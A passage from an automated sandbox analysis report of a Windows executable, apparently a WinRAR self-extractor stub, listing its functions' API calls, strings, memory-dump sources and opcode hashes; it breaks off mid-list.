                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00888F59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AllocByteCharGlobalMultiWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 3286310052-4209811716
                • Opcode ID: 26d18ecaf94605f856e77563b2970e0e0c8c0faf1281214ac46a4b55f1b58a28
                • Instruction ID: 1b3c66dbf1f36bc7762a45f9061ce318c0bfda738bdb31a6be4f85bcb0a35957
                • Opcode Fuzzy Hash: 26d18ecaf94605f856e77563b2970e0e0c8c0faf1281214ac46a4b55f1b58a28
                • Instruction Fuzzy Hash: D7314E31504311BBEB25BB289C02FAF7758FF86724F54011AF911D61C1EF649A0983A6
                Function 00889635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                Download Yara Rule
                APIs
                • ShowWindow.USER32(?,00000000), ref: 0088964E
                • GetWindowRect.USER32(?,00000000), ref: 00889693
                • ShowWindow.USER32(?,00000005,00000000), ref: 0088972A
                • SetWindowTextW.USER32(?,00000000), ref: 00889732
                • ShowWindow.USER32(00000000,00000005), ref: 00889748
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: b07a161361f246d324f4f282218b90d3a271ab6417548d9744d6e2b38e99e631
                • Instruction ID: c1417bb6347e2a86b204122c42ea69e06ee106c90962f87c6b6564531f8b8c58
                • Opcode Fuzzy Hash: b07a161361f246d324f4f282218b90d3a271ab6417548d9744d6e2b38e99e631
                • Instruction Fuzzy Hash: 1931AD31005214EFCF11AF64DC48B6B7BA8FF58711F09865AFA89DA162DB34E905CB61
                Function 0089BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0089BF79: _free.LIBCMT ref: 0089BFA2
                • _free.LIBCMT ref: 0089C003
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 0089C00E
                • _free.LIBCMT ref: 0089C019
                • _free.LIBCMT ref: 0089C06D
                • _free.LIBCMT ref: 0089C078
                • _free.LIBCMT ref: 0089C083
                • _free.LIBCMT ref: 0089C08E
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction ID: 3856fabac75b79380fb68a497fe74c8f646ad68b4923e174b818ade47f39b3bb
                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction Fuzzy Hash: 7F114D31540B05FADE20BBB4DD4AFCBB799FF01700F488864B29DE6852DF65F9048A92
                Function 008920CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,008920C1,0088FB12), ref: 008920D8
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008920E6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008920FF
                • SetLastError.KERNEL32(00000000,?,008920C1,0088FB12), ref: 00892151
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: d593ded6ae5ccf4059e2a86ca51e54aa90526fe5b12aeccc87b2b845b3610146
                • Instruction ID: 6f057630e8c7d301ad2bec89b4788c55ed62ae4dce0712b7e38392bc4c171983
                • Opcode Fuzzy Hash: d593ded6ae5ccf4059e2a86ca51e54aa90526fe5b12aeccc87b2b845b3610146
                • Instruction Fuzzy Hash: D70188321497127EBF543BB97C855163A44FB237747290B29F210D55F1FE515C11A245
                Function 0088DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: 94eb6eb496f5a97d4798ef8d786e978a730e7239039ffd481e565fbd1d70b511
                • Instruction ID: 3382ad424327cbba90a1fe94d2727d6aec9b4d3426ef6d1ce124f2d7045dc3ca
                • Opcode Fuzzy Hash: 94eb6eb496f5a97d4798ef8d786e978a730e7239039ffd481e565fbd1d70b511
                • Instruction Fuzzy Hash: 730128726527229B5F307FB45C817AA67D5FB43316720123BE601D3380EA91CC82DBA0
                Function 00880CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                Download Yara Rule
                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880D0D
                  • Part of subcall function 0087ACF5: GetVersionExW.KERNEL32(?), ref: 0087AD1A
                • LocalFileTimeToFileTime.KERNEL32(?,00880CB8), ref: 00880D31
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00880D47
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00880D56
                • SystemTimeToFileTime.KERNEL32(?,00880CB8), ref: 00880D64
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880D72
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: 3a9c666c3c3802f7c8ec730f80ec22fa91716317a4edcf418f5eb6a212e41dc8
                • Instruction ID: 0c88810e38e865b5e93574969fa73aa5e7878e9ce50d9d6ccbd3295b76c111ee
                • Opcode Fuzzy Hash: 3a9c666c3c3802f7c8ec730f80ec22fa91716317a4edcf418f5eb6a212e41dc8
                • Instruction Fuzzy Hash: A231E97A90020AEBCB00EFE4C8859EFBBBCFF58700B04456AE955E3610E7309A45CB65
                Function 008891B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: aaddb1a09d6d2fc88bc6d67747b6e8d85c13bbbd168d0ed51161af3c3ee5f8df
                • Instruction ID: 917711647aa094cda32b562069f8f24ec5dbc4720a7192030a53b74432f224dd
                • Opcode Fuzzy Hash: aaddb1a09d6d2fc88bc6d67747b6e8d85c13bbbd168d0ed51161af3c3ee5f8df
                • Instruction Fuzzy Hash: 2C21AE7160420EBBEB04BB14CC81E3B77ADFF91788B188128FD59DA302E364ED819791
                Function 00898FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,008B0EE8,00893E14,008B0EE8,?,?,00893713,00000050,?,008B0EE8,00000200), ref: 00898FA9
                • _free.LIBCMT ref: 00898FDC
                • _free.LIBCMT ref: 00899004
                • SetLastError.KERNEL32(00000000,?,008B0EE8,00000200), ref: 00899011
                • SetLastError.KERNEL32(00000000,?,008B0EE8,00000200), ref: 0089901D
                • _abort.LIBCMT ref: 00899023
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 92e17c86494b32b91721c52bd572a2288ad8bfe3f82b6c4aa125c038e9212dc7
                • Instruction ID: 64cfc4dc010e3a74ef8b240c8d39eae107cf7b904444af5ba984f27ccdcb92d4
                • Opcode Fuzzy Hash: 92e17c86494b32b91721c52bd572a2288ad8bfe3f82b6c4aa125c038e9212dc7
                • Instruction Fuzzy Hash: 77F02835604E02EBDE22332C6C0AB2B2A2AFFD3760F2D0518F425D3A92EF25C9019456
                Function 0088D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088D2F2
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088D30C
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088D31D
                • TranslateMessage.USER32(?), ref: 0088D327
                • DispatchMessageW.USER32(?), ref: 0088D331
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088D33C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: 26a09ed5801098d5eb0d079ea9698d3c571d0d11d32339361472f9cd80e19285
                • Instruction ID: aac68d4a6966627fe77ed15c6783faf0519654110e697e9591355d01b0ba9978
                • Opcode Fuzzy Hash: 26a09ed5801098d5eb0d079ea9698d3c571d0d11d32339361472f9cd80e19285
                • Instruction Fuzzy Hash: 0FF03C72A02619ABCB206BA1EC4DEDBBF6DFF62391F008112F606D2150E6348941CBB1
                Function 0088C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                Download Yara Rule
                APIs
                • _wcschr.LIBVCRUNTIME ref: 0088C435
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CompareString_wcschr
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 2548945186-3358265660
                • Opcode ID: 3ce21cbd09db7d59ba46dc2a7f3bd4b787e269b80cdb4c55bfa24db045eba336
                • Instruction ID: 54bff48affb28de269a9b7bde21c0636de5f3832ad34769ebcaf41e60a91725a
                • Opcode Fuzzy Hash: 3ce21cbd09db7d59ba46dc2a7f3bd4b787e269b80cdb4c55bfa24db045eba336
                • Instruction Fuzzy Hash: ED31B27290020DAADF25FA94CC85FEA77BDFB14314F004066FA14D2094EBB08EC4CB61
                Function 0088ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                Download Yara Rule
                APIs
                • LoadBitmapW.USER32(00000065), ref: 0088ADFD
                • GetObjectW.GDI32(00000000,00000018,?), ref: 0088AE22
                • DeleteObject.GDI32(00000000), ref: 0088AE54
                • DeleteObject.GDI32(00000000), ref: 0088AE77
                  • Part of subcall function 00889E1C: FindResourceW.KERNEL32(0088AE4D,PNG,?,?,?,0088AE4D,00000066), ref: 00889E2E
                  • Part of subcall function 00889E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0088AE4D,00000066), ref: 00889E46
                  • Part of subcall function 00889E1C: LoadResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E59
                  • Part of subcall function 00889E1C: LockResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID: ]
                • API String ID: 142272564-3352871620
                • Opcode ID: 4c0975ea7cdc458ef3cb52b629d3672b48d2a21aff7df14e197c9eeea2bd1148
                • Instruction ID: 7c36371955236f9a2bfed546313d01742e30f0b5ddd3f9bc44a9f60f07e532bf
                • Opcode Fuzzy Hash: 4c0975ea7cdc458ef3cb52b629d3672b48d2a21aff7df14e197c9eeea2bd1148
                • Instruction Fuzzy Hash: 1E010032541616A7E72077689C05A7FBB6AFB81B42F080212FE40E7291EA728C1197B2
                Function 0088CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088CCDB
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0088CCF1
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0088CD05
                • SetDlgItemTextW.USER32(?,00000068), ref: 0088CD14
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: f6aa4adeeea8d7831de3e9c14c6a9b72ada1845c0522ac71f76a09785ee45163
                • Instruction ID: fda12bcfa739fc583acd53e01abe42c9826589e736173f514b3c442a1df576b7
                • Opcode Fuzzy Hash: f6aa4adeeea8d7831de3e9c14c6a9b72ada1845c0522ac71f76a09785ee45163
                • Instruction Fuzzy Hash: 3B012432285214BED6216F689C08F677B6EFB6AB02F108512F346E20E5C6B1A9058B75
                Function 008975C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00897573,00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002), ref: 008975E2
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008975F5
                • FreeLibrary.KERNEL32(00000000,?,?,?,00897573,00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002), ref: 00897618
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 60f963c82f3bb48c6e0b4d453f1fc6d5c569afb52cc6fd29c803ac7c0f4b5384
                • Instruction ID: 3ed7c00f057258925b65034a94af66f2c390e6f7cdf9fcbff607f3c9d9693be7
                • Opcode Fuzzy Hash: 60f963c82f3bb48c6e0b4d453f1fc6d5c569afb52cc6fd29c803ac7c0f4b5384
                • Instruction Fuzzy Hash: DBF04431A14618BBEB15AF95DC09B9DBFB9FF05715F044059F805E2550DF748A40CB54
                Function 0087EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00880085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                  • Part of subcall function 00880085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087EB92
                • GetProcAddress.KERNEL32(008B81C0,CryptUnprotectMemory), ref: 0087EBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: f192014346154eb4c2ff8655c64b2ce0fbd227ca21ce4a4f47aeb07fa5c563cc
                • Instruction ID: e308cae258f2db948cd9d4bce4fdac92f187be34ff41eb7c099cd7d349e98a21
                • Opcode Fuzzy Hash: f192014346154eb4c2ff8655c64b2ce0fbd227ca21ce4a4f47aeb07fa5c563cc
                • Instruction Fuzzy Hash: BBE04F71400B41AEEB309F389809B42BEE4FB1A710B04C85DF4E6E3A50D6B8D5449B50
                Function 00897DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
